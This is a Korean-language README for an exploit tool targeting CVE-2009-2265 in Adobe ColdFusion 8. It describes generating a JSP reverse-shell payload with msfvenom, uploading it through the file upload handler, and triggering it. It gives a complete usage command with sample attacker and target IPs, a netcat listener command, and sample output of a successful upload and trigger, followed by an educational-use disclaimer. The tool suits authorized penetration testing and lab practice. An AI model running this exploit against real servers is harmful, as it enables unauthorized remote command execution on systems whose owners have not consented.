
Adobe ColdFusion 8 - 원격 명령 실행 (RCE)
이 익스플로잇은 Adobe ColdFusion 8 (CVE-2009-2265)의 알려진 취약점을 대상으로 합니다. 악의적인 JSP 페이로드를 업로드하여 리버스 셸 연결을 설정함으로써 원격 명령 실행(RCE)을 가능하게 합니다.
msfvenom을 사용하여 JSP 페이로드를 자동 생성이 익스플로잇을 사용하려면 다음이 필요합니다:
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>
-l <LHOST>: 로컬 공격자 IP (예: 10.10.16.5)-p <LPORT>: 리버스 셸을 위한 로컬 공격자 포트 (예: 9001)-r <RHOST>: 원격 대상 IP (예: 10.10.10.11)-q <RPORT>: ColdFusion이 실행 중인 원격 대상 포트 (예: 8500)./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
공격자 머신에서 리스너 시작:
nc -lnvp 9001
적절한 인수와 함께 익스플로잇 실행
실행 후 페이로드가 리스너로 다시 연결됨
페이로드 생성:
msfvenom을 사용하여 악의적인 JSP 페이로드 생성페이로드 업로드:
페이로드 트리거:
리버스 셸 설정:
msfvenomcurlnc (Netcat)[+] JSP 리버스 셸 페이로드 생성 중...
[+] 페이로드가 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'로 저장되었습니다.
[+] 대상에 페이로드 업로드 중...
[+] 서버 응답:
<script type="text/javascript">
window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
</script>
[+] 포트 9001에서 Netcat 리스너가 시작되기를 기다리는 중...
[+] 포트 9001에서 Netcat 리스너가 실행 중임을 감지했습니다!
[+] 페이로드 트리거 시도 중...
[+] 페이로드가 성공적으로 트리거되었습니다. 리버스 셸을 위해 리스너를 확인하세요.
[+] 로컬 파일 정리 중...
[+] 완료!
이 스크립트는 교육 목적으로만 사용됩니다. 소유하거나 테스트할 명시적 권한이 있는 시스템에서만 사용하십시오. 소유하지 않은 시스템에서 이 익스플로잇을 무단 사용하는 것은 불법이며 비윤리적입니다.
개발자: [0xDTC]